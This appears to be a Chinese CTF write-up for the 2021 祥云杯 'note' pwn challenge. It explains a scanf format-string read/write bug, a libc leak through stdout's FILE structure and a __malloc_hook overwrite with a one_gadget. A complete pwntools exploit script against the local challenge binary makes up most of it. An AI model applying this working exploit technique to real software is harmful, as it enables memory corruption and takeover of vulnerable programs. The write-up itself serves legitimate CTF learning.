2021 祥云杯 pwn-note
这是一道scanf任意读写的pwn题
漏洞点发生在上图
在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章
拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。
偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './note'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'choice:'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('size: ', str(size))
r.sendafter('content: ', content)
def show():
r.sendlineafter(menu, '3')
def say(note1, note2):
r.sendlineafter(menu, '2')
r.sendafter('say ? ', note1)
r.sendlineafter('? ', note2)
p1 = b'%11$s'
p2 = p64(0xfbad1800) + p64(0) * 3
say(p1, p2)
_IO_2_1_stdin_ = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('_IO_2_1_stdin_ = ' + hex(_IO_2_1_stdin_))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = _IO_2_1_stdin_ - libc.sym['_IO_2_1_stdin_']
li('libc_base = ' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
li('malloc_hook = ' + hex(malloc_hook))
realloc_hook = libc_base + libc.sym['__realloc_hook']
li('realloc_hook = ' + hex(realloc_hook))
one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = libc_base + one[1]
p3 = b'%7$saaaa' + p64(malloc_hook)
p4 = p64(one_gadget)
say(p3, p4)
r.sendline('1')
r.interactive()